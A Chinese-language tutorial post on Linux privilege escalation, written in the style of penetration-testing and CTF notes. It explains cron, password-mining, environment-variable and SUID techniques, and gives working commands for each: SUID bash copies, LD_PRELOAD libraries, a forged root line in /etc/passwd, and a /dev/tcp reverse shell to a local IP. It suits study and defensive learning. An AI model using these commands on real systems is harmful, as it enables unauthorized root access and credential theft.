Linux \u63d0\u6b0a\u662f\u6307\u901a\u904e\u5404\u7a2e\u65b9\u6cd5\u5c07\u7cfb\u7d71\u4e2d\u7684\u4e00\u500b\u666e\u901a\u7528\u6236\u6216\u53d7\u9650\u7528\u6236\u7684\u6b0a\u9650\u63d0\u5347\u70ba\u66f4\u9ad8\u7684\u6b0a\u9650\uff08\u901a\u5e38\u662f root\uff09\uff0c\u4ee5\u7372\u53d6\u5c0d\u6574\u500b\u7cfb\u7d71\u7684\u63a7\u5236\u6b0a\u3002\u5e38\u898b\u7b56\u7565\u6709\u4ee5\u4e0b\u5e7e\u7a2e<\/p>\n\n\n\n
<\/p>\n\n\n\n
https:\/\/yu-shiuan2017.medium.com\/htb-cronos%E9%9D%B6%E6%A9%9F-write-up-4de6734e1a0a<\/a><\/p>\n\n\n\n <\/p>\n\n\n\n \u5982\u679c \u5247\u7576 \u56e0\u6b64\u53ef\u5728\u81ea\u5df1\u7684\/home\/user\u76ee\u9304\u4e0b\u65b0\u589eoverwith.sh\u505a\u63d0\u6b0a\uff0c\u5982\u4e0b\u6240\u793a<\/p>\n\n\n\n \u7b49\u5f851\u5206\u9418\u5f8c\uff0coverwrite.sh\u6703\u88ab\u57f7\u884c\uff0c\/tmp\/bash\u5c31\u53ef\u57f7\u884c\/bin\/bash\uff0c\u63a5\u8457\u5c31\u53ef\u57f7\u884c\u4ee5\u4e0b\u6307\u4ee4\u63d0\u6b0a<\/p>\n\n\n\n \u5982\u679c \u53ef\u5617\u8a66\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a<\/p>\n\n\n\n \u7b49\u5f851\u5206\u9418\u5f8c\uff0c\u5373\u53ef\u57f7\u884c\u4ee5\u4e0b\u6307\u4ee4<\/p>\n\n\n\n \u5982\u679c \u7b49\u5f851\u5206\u9418\u5f8c\uff0c\u5373\u53ef\u57f7\u884c\u4ee5\u4e0b\u6307\u4ee4<\/p>\n\n\n\n <\/p>\n\n\n\n \u900f\u904e\u767c\u73fe\u9ad8\u6b0a\u9650\u5bc6\u78bc\u63d0\u6b0a\uff0c\u5e38\u898b\u65b9\u6cd5\u5982\u4e0b <\/p>\n\n\n\n \u5f9e \u5f9e\u6b77\u53f2\u8a18\u9304\u4e2d\u627e\u9ad8\u6b0a\u9650\u5e33\u865f\u7684\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n \u5f9e\u5167\u5b58\u4e2d\u627e\u9ad8\u6b0a\u9650\u5e33\u865f\u7684\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n \u5047\u5982\u76ee\u6a19\u6709ftp, \u5148\u67e5\u8a62ftp \u7684 pid<\/p>\n\n\n\n # \u63a5\u8457\u4f7f\u7528gdb\u627e\u8a18\u61b6\u9ad4\u5167\u7684\u5bc6\u78bc<\/p>\n\n\n\n \u5c0b\u627eheap\u5340\u57df\u7684\u8d77\u9ede\u548c\u7d42\u9ede\uff0c\u4e00\u65e6\u627e\u5230\u5f8c\u628a\u4ed6\u5b58\u5230\/tmp\/men\uff0c\u5728\u7528strings\u770b\u660e\u6587\u5bc6\u78bc <\/p>\n\n\n\n <\/p>\n\n\n\n Linux \u7684\u74b0\u5883\u8b8a\u91cf\u63d0\u6b0a\u662f\u4e00\u7a2e\u901a\u904e\u64cd\u4f5c\u6216\u4fee\u6539\u74b0\u5883\u8b8a\u91cf\u4f86\u7372\u53d6\u66f4\u9ad8\u6b0a\u9650\u7684\u6280\u8853\u3002\u5728 Linux \u7cfb\u7d71\u4e2d\uff0c\u74b0\u5883\u8b8a\u91cf\u53ef\u4ee5\u5f71\u97ff\u547d\u4ee4\u7684\u57f7\u884c\u65b9\u5f0f\u6216\u61c9\u7528\u7a0b\u5e8f\u7684\u884c\u70ba\u3002\u5982\u679c\u914d\u7f6e\u4e0d\u7576\uff0c\u53ef\u80fd\u5c0e\u81f4\u7279\u6b0a\u63d0\u5347\u7684\u6f0f\u6d1e\u3002\u4ee5\u4e0b\u662f\u5e7e\u7a2e\u5e38\u898b\u7684\u74b0\u5883\u8b8a\u91cf\u63d0\u6b0a\u65b9\u5f0f\u53ca\u7bc4\u4f8b\uff1a<\/p>\n\n\n\n PATH \u5b9a\u7fa9\u4e86\u57f7\u884c\u547d\u4ee4\u6642\u641c\u7d22\u7684\u76ee\u9304\u9806\u5e8f\u3002\u5982\u679c\u653b\u64ca\u8005\u80fd\u5920\u5c07\u60e1\u610f\u7a0b\u5f0f\u653e\u5728PATH\u512a\u5148\u4f4d\u7f6e\uff0c\u53ef\u80fd\u6703\u57f7\u884c\u60e1\u610f\u7a0b\u5f0f\u3002\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n \u5982\u679c ls \u5728 \/tmp \u76ee\u9304\u4e2d\u88ab\u512a\u5148\u57f7\u884c\uff0c\u653b\u64ca\u8005\u5c31\u80fd\u5c07 \/bin\/bash \u66ff\u63db\u70ba\u5e36\u6709 SUID \u6b0a\u9650\u7684\u60e1\u610f\u526f\u672c\u3002<\/p>\n\n\n\n LD_PRELOAD \u5141\u8a31\u5728\u57f7\u884c\u7a0b\u5f0f\u524d\u52a0\u8f09\u81ea\u5b9a\u7fa9\u7684\u5171\u4eab\u5eab\u3002\u5982\u679c\u6709\u7279\u6b0a\u7684\u7a0b\u5f0f\u672a\u6b63\u78ba\u9650\u5236\u6b64\u8b8a\u91cf\uff0c\u53ef\u80fd\u6703\u88ab\u653b\u64ca\u8005\u5229\u7528\u3002\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n 1.\u6e96\u5099\u4e00\u500bexploit.c\u4f7f\u7528setuid(0)\uff0c\u53ef\u5c07\u7a0b\u5e8f\u7684\u6709\u6548\u7528\u6236 ID (eUID) \u8a2d\u7f6e\u70ba 0\uff0c\u4e5f\u5c31\u662f root \u7528\u6236\u3002\u9019\u610f\u5473\u8457\uff0c\u5728\u9019\u500b\u51fd\u6578\u57f7\u884c\u5f8c\uff0c\u7a0b\u5e8f\u5c07\u64c1\u6709 root \u7684\u6b0a\u9650\u3002<\/p>\n\n\n\n 2.\u900f\u904e-shared\u8981\u6c42gcc \u7de8\u8b6f\u51fa\u4e00\u500b\u5171\u4eab\u5eab\uff08dynamic library\uff09\uff0c\u4e5f\u5c31\u662f .so \u6a94\u6848\u3002\u5171\u4eab\u5eab\u53ef\u4ee5\u88ab\u5176\u4ed6\u7a0b\u5f0f\u5728\u904b\u884c\u6642\u52d5\u614b\u9023\u7d50\u3002\u4e26\u900f\u904e-fPIC\u53c3\u6578 Position-Independent Code\uff0c\u8981\u6c42\u7de8\u8b6f\u51fa\u7684\u7a0b\u5f0f\u78bc\u53ef\u4ee5\u88ab\u8f09\u5165\u5230\u8a18\u61b6\u9ad4\u7684\u4efb\u610f\u4f4d\u7f6e\uff0c\u9019\u5c0d\u65bc\u5171\u4eab\u5eab\u4f86\u8aaa\u662f\u5f88\u91cd\u8981\u7684\u3002<\/p>\n\n\n\n 3. \u4f7f\u7528LD_PRELOAD\u6307\u5b9a\u5728\/bin\/su\u7a0b\u5f0f\u8f09\u5165\u6642\uff0c\u8981\u512a\u5148\u8f09\u5165\u7684exploit.so\u5171\u4eab\u5eab\u3002 <\/p>\n\n\n\n \u4e0a\u8ff0\u6b65\u9a5f\u7e3d\u7d50\u4f86\u8aaa\uff0c\u5728\u57f7\u884c \/bin\/su \u547d\u4ee4\u6642\uff0c\u5148\u8f09\u5165\u6211\u5011\u81ea\u5b9a\u7fa9\u7684 LD_LIBRARY_PATH \u5b9a\u7fa9\u4e86\u52a0\u8f09\u5171\u4eab\u5eab\u7684\u8def\u5f91\u3002\u5982\u679c\u653b\u64ca\u8005\u53ef\u4ee5\u8a2d\u7f6e\u6b64\u8b8a\u91cf\uff0c\u53ef\u80fd\u8a98\u5c0e\u57f7\u884c\u4e0d\u53d7\u4fe1\u4efb\u7684\u5eab\u3002<\/p>\n\n\n\n \u5982\u679c\u6709\u8fa6\u6cd5\u767c\u73fe\u5728\u904b\u884c\u6642\u6703\u52d5\u614b\u8f09\u5165\u5171\u4eab\u5eab\u7684\u6f0f\u6d1e\u7a0b\u5f0f\uff08some_vulnerable_program\uff09\uff0c\u4e14\u8f09\u5165\u7684\u5171\u4eab\u5eab\u540d\u7a31\u6070\u597d\u8207\u6211\u5011\u60e1\u610f\u7de8\u8b6f\u7684 \u4e00\u65e6\u6211\u5011\u7684\u60e1\u610f\u5171\u4eab\u5eab\u88ab\u8f09\u5165\uff0c\u5176\u4e2d\u7684\u51fd\u6578\u5c31\u6709\u53ef\u80fd\u5728\u67d0\u4e9b\u7279\u5b9a\u7684\u689d\u4ef6\u4e0b\u88ab\u57f7\u884c\uff0c\u5c0e\u81f4\u7a0b\u5e8f\u7684\u6b0a\u9650\u88ab\u63d0\u5347\uff0c\u4e26\u958b\u555f\u4e00\u500b bash shell\u3002<\/p>\n\n\n\n \u9019\u4e9b\u8b8a\u91cf\u63a7\u5236\u8173\u672c\u8a9e\u8a00\u57f7\u884c\u6642\u7684\u6a21\u7d44\u641c\u7d22\u8def\u5f91\u3002\u5982\u679c\u7a0b\u5e8f\u80fd\u900f\u904esudo\u7b49\u9ad8\u6b0a\u9650\u57f7\u884c\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u5229\u7528\u5b83\u5011\u3002\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n \u5047\u5982python\u53ef\u7528sudo\u57f7\u884c\uff0c\u53ef\u4ee5\u900f\u904e\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a <\/p>\n\n\n\n 1.\u5728 2.\u5c07\u74b0\u5883\u8b8a\u6578 3.\u4ee5 sudo\u6b0a\u9650\u57f7\u884c Python \u89e3\u8b6f\u5668\uff0c\u4e26\u57f7\u884c\u6307\u5b9a\u7684 Python \u7a0b\u5f0f\u78bc<\/p>\n\n\n\n \u9019\u4e09\u884c\u6307\u4ee4\u7684\u7d44\u5408\uff0c\u5be6\u73fe\u4e86\u4e00\u500b\u7c21\u55ae\u7684\u63d0\u6b0a\u653b\u64ca\u3002\u901a\u904e\u5275\u5efa\u4e00\u500b Python \u811a\u672c\uff0c\u5229\u7528 <\/p>\n\n\n\n suid \u53ef\u4ee5\u8b93\u6a94\u6848\u547c\u53eb\u8005\u66ab\u6642\u53d6\u5f97\u6a94\u6848\u64c1\u6709\u8005\u7684\u6b0a\u9650\uff0csuid \u63d0\u6b0a\u7684\u60f3\u6cd5\u8b93\u4e00\u822c\u4f7f\u7528\u8005\u57f7\u884c root \u4f7f\u7528\u8005\u6240\u64c1\u6709\u7684 suid \u6587\u4ef6\uff0c\u4ee5\u9054\u5230\u63d0\u6b0a\u7684\u76ee\u7684\u3002<\/p>\n\n\n\n \u5047\u8a2d\u6211\u5011\u73fe\u5728\u6709\u4e00\u500b\u53ef\u57f7\u884c\u6a94ls,\u5176\u5c6c\u4e3b\u70baroot,\u7576\u6211\u5011\u900f\u904e\u975eroot\u4f7f\u7528\u8005\u767b\u5165\u6642,\u5982\u679cls\u8a2d\u5b9a\u4e86SUID\u6b0a\u9650,\u6211\u5011\u53ef\u5728\u975eroot\u4f7f\u7528\u8005\u4e0b\u57f7\u884c\u8a72\u4e8c\u9032\u4f4d\u57f7\u884c\u6a94,\u5728\u57f7\u884c\u6a94\u6642,\u8a72\u9032\u7a0b\u7684\u6b0a\u9650\u5c07\u70baroot\u6b0a\u9650.<\/p>\n\n\n\n \u5c0b\u627e\u6709suid\u7684\u6a94\u6848 <\/p>\n\n\n\n \u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\uff0c\u8209\u4f8b\u5982\u4e0b <\/p>\n\n\n\n \u6216\u662f\u76f4\u63a5\u7528reverse shell<\/p>\n\n\n\n \u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\uff0c\u8209\u4f8b\u5982\u4e0b <\/p>\n\n\n\n \u7136\u5f8c\u5728less\u4e2d\u8f38\u5165: \u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\uff0c\u76f4\u63a5\u4f7f\u7528cp\u547d\u4ee4\u8986\u84cb\u539f\u4f86\u7684\/etc\/passwd\u6587\u4ef6<\/p>\n\n\n\n \u5982\u679c\u6709\u8a2d\u5b9aSUID\uff0c\u53ef\u63d0\u6b0a\u5982\u4e0b<\/p>\n\n\n\nCron (Path)<\/h3>\n\n\n\n
\/etc\/crontab<\/code> \u5167\u6709 PATH<\/code> \u8b8a\u6578\u3002\u800c\u4e14PATH<\/code>\u5305\u542b \/home\/user<\/code> \u6216\u985e\u4f3c\u76ee\u9304\uff0c\u4f8b\u5982PATH=\/home\/user:\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin<\/code><\/p>\n\n\n\ncrontab<\/code> \u57f7\u884c\u4e00\u500b\u547d\u4ee4\u6642\uff0c\u5b83\u6703\u5148\u5728\u9019\u4e9b\u76ee\u9304\u4e2d\u67e5\u627e\u8a72\u547d\u4ee4\u3002\u5047\u5982\u6709\u4e00\u500bcron\u4efb\u52d9\u9700\u8981\u57f7\u884c overwrite.sh<\/code> \uff0c\u7cfb\u7d71\u6703\u9996\u5148\u5728 \/home\/user<\/code> \u76ee\u9304\u4e0b\u5c0b\u627e\u8a72\u547d\u4ee4\u3002<\/p>\n\n\n\n#echo 'cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash' > \/home\/user\/overwrite.sh\n#chmod +x \/home\/user\/overwrite.sh<\/code><\/pre>\n\n\n\n#\/tmp\/bash -p\n$id\nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\nCron (Wildcards)<\/h3>\n\n\n\n
\/etc\/crontab<\/code> \u5167\u767c\u73fe\u6709script\u4f7f\u7528tar\u642d\u914dwilcard (*) \u58d3\u7e2e\/home\/user\/\u4e0b\u7684\u5167\u5bb9\uff0c\u4f8b\u5982tar -czf \/backup\/user_backup.tar.gz \/home\/user\/*<\/code><\/p>\n\n\n\n# echo 'cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash' > \/home\/user\/runme.sh\n# touch \/home\/user\/--checkpoint=1\n# touch \/home\/user\/--checkpoint-action=exec=sh\\ runme.sh<\/code><\/pre>\n\n\n\n--checkpoint=1<\/code>: \u9019\u500b\u9078\u9805\u5728 GNU tar<\/code> \u4e2d\u901a\u5e38\u7528\u4f86\u6307\u5b9a\u5728\u6bcf\u500b\u6a94\u6848\u8655\u7406\u5b8c\u6210\u5f8c\uff08\u6bcf\u500b “checkpoint”\uff09\uff0ctar<\/code> \u61c9\u8a72\u986f\u793a\u4e00\u689d\u8a0a\u606f\u6216\u57f7\u884c\u67d0\u4e9b\u64cd\u4f5c\u3002\u5728\u9019\u500b\u4f8b\u5b50\u4e2d\uff0c1<\/code>\u610f\u5473\u8457\u5728\u6bcf\u8655\u7406\u4e00\u500b\u6a94\u6848\u6642\uff0ctar<\/code> \u5c31\u6703\u57f7\u884c\u6307\u5b9a\u7684\u52d5\u4f5c\u3002<\/p>\n\n\n\n--checkpoint-action=exec=sh runme.sh<\/code>: \u9019\u500b\u9078\u9805\u6307\u793a tar<\/code> \u5728\u6bcf\u500b checkpoint \u6642\u57f7\u884c\u7279\u5b9a\u7684\u52d5\u4f5c\u3002exec=sh runme.sh<\/code> \u7684\u610f\u601d\u662f\u8b93 tar<\/code> \u4f7f\u7528 sh shell <\/code>\u4f86\u57f7\u884c\u540d\u70ba runme.sh<\/code> \u7684\u8173\u672c\u3002<\/p>\n\n\n\n# \/tmp\/bash -p \n$ id \nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\nCron (File Overwrite)<\/h3>\n\n\n\n
\/etc\/crontab<\/code> \u5167\u767c\u73fe\u6709script\u53ef\u4ee5\u88ab\u5beb\u5165\uff0c\u4f8b\u5982\/usr\/local\/bin\/overwrite.sh<\/code>\u662f\u53ef\u4ee5\u88ab\u5beb\u5165\u7684\uff0c\u53ef\u5617\u8a66\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a<\/p>\n\n\n\necho 'cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash' >> \/usr\/local\/bin\/overwrite.sh<\/code><\/pre>\n\n\n\n# \/tmp\/bash -p \n$ id \nuid=0(root)...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\nPassword Mining<\/h2>\n\n\n\n
\n\n\n\nPassword Mining (Configuration Files)<\/h3>\n\n\n\n
configuration file<\/code>\u627e\u9ad8\u6b0a\u9650\u5e33\u865f\u7684\u5bc6\u78bc\uff0c\u8209\u4f8b\u5982\u4e0b <\/p>\n\n\n\ncat \/home\/user\/myvpn.ovpn<\/code>\uff0c\u95dc\u6ce8auth-user-pass<\/p>\n\n\n\ncat \/etc\/openvpn\/auth.txt<\/code>\uff0c\u95dc\u6ce8\u660e\u6587\u7684\u5bc6\u78bc<\/p>\n\n\n\ncat \/home\/user\/.irssi\/config | grep -i passw<\/code>\uff0c\u95dc\u6ce8\u660e\u6587\u7684\u5bc6\u78bc<\/p>\n\n\n\n
\n\n\n\nPassword Mining (History)<\/h3>\n\n\n\n
cat ~\/.bash_history | grep -i passw<\/code>\uff0c\u95dc\u6ce8\u660e\u6587\u7684\u5bc6\u78bc<\/p>\n\n\n\n
\n\n\n\nPassword Mining (Memory)<\/h3>\n\n\n\n
ps -ef | grep ftp<\/code><\/p>\n\n\n\n#gdb -p [FTP PID]\n(gdb)info proc mappings<\/code><\/pre>\n\n\n\n(gdb) dump memory \/tmp\/mem [Start Address] [End Address]\n(gdb) q\nstrings \/tmp\/mem | grep passw<\/code><\/pre>\n\n\n\n
\n\n\n\n\u74b0\u5883\u8b8a\u91cf<\/h2>\n\n\n\n
\n\n\n\nPATH \u74b0\u5883\u8b8a\u91cf\u7684\u6feb\u7528<\/h3>\n\n\n\n
export PATH=\/tmp:$PATH\necho 'cp \/bin\/bash \/tmp\/bash && chmod +s \/tmp\/bash' > \/tmp\/ls\nchmod +x \/tmp\/ls\nls<\/code><\/pre>\n\n\n\n
\n\n\n\nLD_PRELOAD \u74b0\u5883\u8b8a\u91cf<\/h3>\n\n\n\n
echo 'void _init() { setuid(0); system(\"\/bin\/bash\"); }' > exploit.c<\/code><\/pre>\n\n\n\ngcc -shared -o exploit.so -fPIC exploit.c<\/code><\/pre>\n\n\n\nLD_PRELOAD=.\/exploit.so \/bin\/su<\/code><\/pre>\n\n\n\nexploit.so<\/code> \u5171\u4eab\u5eab\u3002\u7531\u65bc\u6211\u5011\u5728 exploit.so<\/code> \u4e2d\u5b9a\u7fa9\u4e86 _init<\/code> \u51fd\u6578\uff0c\u800c\u9019\u500b\u51fd\u6578\u6703\u5c07\u7a0b\u5e8f\u7684\u6b0a\u9650\u63d0\u5347\u70ba root\uff0c\u6240\u4ee5\u7576\u6211\u5011\u57f7\u884c \/bin\/su<\/code> \u6642\uff0c\u5be6\u969b\u4e0a\u6703\u4ee5 root \u7684\u8eab\u4efd\u57f7\u884c\uff0c\u4e26\u4e14\u6703\u958b\u555f\u4e00\u500b bash shell<\/p>\n\n\n\n
\n\n\n\nLD_LIBRARY_PATH \u74b0\u5883\u8b8a\u91cf<\/h3>\n\n\n\n
libc.so.6<\/code> \u76f8\u540c\uff0c\u90a3\u53ef\u4ee5\u7528\u4ee5\u4e0b\u65b9\u5f0f\u63d0\u6b0a\u3002<\/p>\n\n\n\n# mkdir \/tmp\/exploit\n# echo 'void my_function() { setuid(0); system(\"\/bin\/bash\"); }' > \/tmp\/exploit\/libc.c\n# gcc -shared -o \/tmp\/exploit\/libc.so.6 -fPIC \/tmp\/exploit\/libc.c\n# export LD_LIBRARY_PATH=\/tmp\/exploit\n# some_vulnerable_program<\/code><\/pre>\n\n\n\nLD_LIBRARY_PATH<\/code>: \u9019\u500b\u74b0\u5883\u8b8a\u6578\u6307\u5b9a\u4e86\u7cfb\u7d71\u5728\u904b\u884c\u7a0b\u5f0f\u6642\uff0c\u9664\u4e86\u7cfb\u7d71\u9810\u8a2d\u7684\u5171\u4eab\u5eab\u641c\u5c0b\u8def\u5f91\u4e4b\u5916\uff0c\u9084\u61c9\u8a72\u641c\u5c0b\u54ea\u4e9b\u76ee\u9304\u3002\u9019\u6a23\u4e00\u4f86\uff0c\u7576\u6211\u5011\u57f7\u884c\u5176\u4ed6\u7a0b\u5f0f\u6642\uff0c\u7cfb\u7d71\u5c31\u6703\u512a\u5148\u5728 \/tmp\/exploit<\/code> \u76ee\u9304\u4e0b\u67e5\u627e\u6240\u9700\u7684\u5171\u4eab\u5eab\u3002<\/p>\n\n\n\n
\n\n\n\nPYTHONPATH\/PERL5LIB\/RUBYLIB \u7b49\u8173\u672c\u74b0\u5883\u8b8a\u91cf<\/h3>\n\n\n\n
\/tmp<\/code> \u76ee\u9304\u4e0b\u5275\u5efa\u4e00\u500b\u540d\u70ba exploit.py<\/code> \u7684 Python \u811a\u672c\uff0c\u4e26\u5c07\u6307\u5b9a\u7684 Python \u7a0b\u5f0f\u78bc\u5beb\u5165\u5176\u4e2d\u3002<\/p>\n\n\n\necho 'import os; os.system(\"\/bin\/bash\")' > \/tmp\/exploit.py<\/code><\/pre>\n\n\n\nPYTHONPATH<\/code> \u8a2d\u7f6e\u70ba \/tmp<\/code>\u3002PYTHONPATH<\/code> \u9019\u500b\u74b0\u5883\u8b8a\u6578\u6307\u5b9a\u4e86 Python \u5728\u5c0e\u5165\u6a21\u7d44\u6642\uff0c\u9664\u4e86\u7cfb\u7d71\u9810\u8a2d\u7684\u6a21\u7d44\u641c\u7d22\u8def\u5f91\u4e4b\u5916\uff0c\u9084\u61c9\u8a72\u641c\u5c0b\u54ea\u4e9b\u76ee\u9304\u3002\u901a\u904e\u5c07 \/tmp<\/code> \u76ee\u9304\u6dfb\u52a0\u5230 PYTHONPATH<\/code> \u4e2d\uff0cPython \u89e3\u8b6f\u5668\u5c31\u80fd\u5920\u627e\u5230\u6211\u5011\u525b\u525b\u5275\u5efa\u7684 exploit.py<\/code> \u811a\u672c<\/p>\n\n\n\nexport PYTHONPATH=\/tmp<\/code><\/code><\/pre>\n\n\n\nsudo python -c 'import exploit'<\/code><\/code><\/pre>\n\n\n\nos.system<\/code> \u51fd\u6578\u57f7\u884c\u7cfb\u7d71\u547d\u4ee4\uff0c\u4e26\u4e14\u4ee5 sudo \u6b0a\u9650\u57f7\u884c\u9019\u500b Python \u811a\u672c\uff0c\u6700\u7d42\u9054\u5230\u958b\u555f\u4e00\u500b\u64c1\u6709 root \u6b0a\u9650\u7684 bash shell\u3002<\/p>\n\n\n\n
\n\n\n\nSUID \u63d0\u6743<\/strong><\/h2>\n\n\n\n
find \/ -type f -perm -4000 -ls 2>\/dev\/null<\/code><\/p>\n\n\n\n
\n\n\n\nfind<\/h3>\n\n\n\n
$ find 1.txt -exec '\/bin\/sh' \\;\nsh-5.0# whoami\nroot<\/code><\/pre>\n\n\n\nfind 1.txt -exec bash -i >& \/dev\/tcp\/192.168.1.11\/9999 0>&1 -p \\;<\/code><\/p>\n\n\n\n
\n\n\n\nless\u548cmore<\/h3>\n\n\n\n
less \/etc\/passwd<\/code><\/p>\n\n\n\n!\/bin\/sh<\/code><\/p>\n\n\n\n
\n\n\n\ncp<\/h3>\n\n\n\n
[kali@localhost ~]$ cat \/etc\/passwd >passwd
[kali@localhost ~]$ openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0
[kali@localhost ~]$ echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::\/root\/:\/bin\/bash' >> passwd
[kali@localhost ~]$ cp passwd \/etc\/passwd
[kali@localhost ~]$ su - hack
Password:
[root@localhost ~]# id
uid=0(hack) gid=0(root) groups=0(root)
[root@localhost ~]# cat \/etc\/passwd|tail -1
hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::\/root\/:\/bin\/bash<\/pre>\n\n\n\n
\n\n\n\nawk<\/h3>\n\n\n\n
awk 'BEGIN {system(\"\/bin\/bash\")}'<\/code><\/p>\n\n\n\n
\n\n\n\n\u5176\u4ed6<\/h3>\n\n\n\n